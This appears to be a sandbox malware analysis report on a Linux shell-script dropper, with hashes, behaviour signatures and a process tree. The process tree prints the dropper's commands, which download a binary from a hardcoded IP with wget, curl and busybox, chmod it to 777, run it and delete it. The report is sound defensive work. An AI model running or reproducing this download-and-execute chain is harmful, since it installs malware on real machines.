Analysis
max time kernel: 8s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240729-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 25/10/2024, 01:20
Static task: static1
Behavioral task: behavioral1
Sample: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
Sample: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
Sample: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
Sample: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource: debian9-mipsel-20240611-en
General
Target: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Size: 10KB
MD5: e85cfec36f14cf1239aeb4b66816d9b6
SHA1: 54996a37402bd68d4d9592629ba35466aa659e7b
SHA256: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
SHA512: 300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
SSDEEP: 192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh: /tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh (PID 1508)
  /bin/rm: /bin/rm bins.sh (PID 1509)
  /usr/bin/wget: wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1510)
  /usr/bin/curl: curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1512) [Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1513)
  /bin/chmod: chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1517) [File and Directory Permissions Modification]
  /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ: ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1518) [Executes dropped EXE]
  /bin/rm: rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ (PID 1519)
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97